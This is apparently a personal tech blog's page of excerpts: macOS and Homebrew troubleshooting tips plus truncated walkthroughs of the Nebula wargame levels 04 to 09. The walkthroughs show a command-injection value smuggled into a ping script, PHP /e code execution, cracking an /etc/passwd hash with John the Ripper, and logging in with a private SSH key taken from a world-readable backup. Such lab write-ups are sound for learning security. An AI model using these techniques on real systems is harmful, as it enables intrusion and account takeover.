Disable macOS Dock’s Bounce to Alert Behaviour
In Terminal defaults write com.apple.dock no-bouncing -bool TRUE killall Dock
In Terminal defaults write com.apple.dock no-bouncing -bool TRUE killall Dock
You can add them to ~/.wine/drive_c/Windows/Fonts/ and then restart. Source
$ brew update Checking out v1.0.1 in /usr/local/Homebrew… To checkout master in /usr/local/Homebrew run: ‘cd /usr/local/Homebrew && git checkout master Checking out v1.0.1 in /usr/local/Homebrew/Library/Taps/caskroom/homebrew-cask… To checkout master in /usr/local/Homebrew/Library/Taps/caskroom/homebrew-cask run: ‘cd /usr/local/Homebrew/Library/Taps/caskroom/homebrew-cask && git checkout master fatal: Cannot update paths and switch to branch ‘v1.0.1’ at the same time. Did you intend to checkout ‘refs/tags/1.0.1’ which can not be resolved as commit? fatal: Needed a single revision invalid upstream refs/tags/1.0.1 Checking out v1.0.1 in /usr/local/Homebrew/Library/Taps/caskroom/homebrew-versions… To checkout master in…
ssh servername /Users/steven/.ssh/config: line 7: Bad configuration option: useroaming /Users/steven/.ssh/config: terminating, 1 bad configuration options Line 7 is UseRoaming no which I because of CVE-2016-0777 $ ssh -V OpenSSH_7.2p2, LibreSSL 2.4.1 Solution: Comment out that line as the version of OpenSSH that ships with macOS 10.12 no longer had that insecure feature.
Level: https://exploit-exercises.com/nebula/level09/ There’s a C setuid wrapper for some vulnerable PHP code… To do this level, log in as the level09 account with the password level09. Files for this level can be found in /home/flag09. $contents = preg_replace(“/(\[email (.*)\])/e”, “spam(\”\\2\”)”, $contents); Using the e modifier is dangerous and has been removed as of PHP 7.0.0. It allows PHP code in the second argument. There is a $useme parameter which might come in handy. So what happens is you pass it…
Level: https://exploit-exercises.com/nebula/level08/ World readable files strike again. Check what that user was up to, and use it to log into flag08 account. To do this level, log in as the level08 account with the password level08. Files for this level can be found in /home/flag08. ls -la /home/flag08 What’s that capture.pcap? Lets load that in Wireshark. Lets open our Kali VM. scp level08@192.0.2.1:/home/flag08/capture.pcap ~/Downloads/ wireshark ~/Downloads/capture.pcap Open capture.pcap in Wireshark. Right click on the first entry, mouse over Follow and…
Use the escape key combination: ctrl+command Then using the regular macOS screenshot shortcuts. https://support.apple.com/en-au/HT201361
Level: https://exploit-exercises.com/nebula/level07/ The flag07 user was writing their very first perl program that allowed them to ping hosts to see if they were reachable from the web server. To do this level, log in as the level07 account with the password level07. Files for this level can be found in /home/flag07. $host = $_[0]; print(“<html><head><title>Ping results</title></head><body><pre>”); @output = `ping -c 3 $host 2>&1`; … ping(param(“Host”)); The program allows command injection via ?Host= Lets set it to localhost; getflag But how…
Level: https://exploit-exercises.com/nebula/level06/ The flag06 account credentials came from a legacy unix system. To do this level, log in as the level06 account with the password level06. Files for this level can be found in /home/flag06. cat /etc/passwd | grep flag06 Gives us flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh Now fire up Kali because we need to use John the Ripper echo “flag06:ueqwOCnSGdsuM:993:993::/home/flag06:/bin/sh” > crack john –show crack flag06:hello:993:993::/home/flag06:/bin/sh Our password is hello Back on the Nebula system: su flag06 Password: hello getflag You have successfully…
Level: https://exploit-exercises.com/nebula/level04/ Check the flag05 home directory. You are looking for weak directory permissions To do this level, log in as the level05 account with the password level05. Files for this level can be found in /home/flag05. cd /home/flag05 ls -la ls -la .backup cp backup-19072011.tgz ~ cd tar xvfz backup-19072011.tgz cd .ssh ssh -i id_rsa flag05@localhost getflag You have successfully executed getflag on a target account.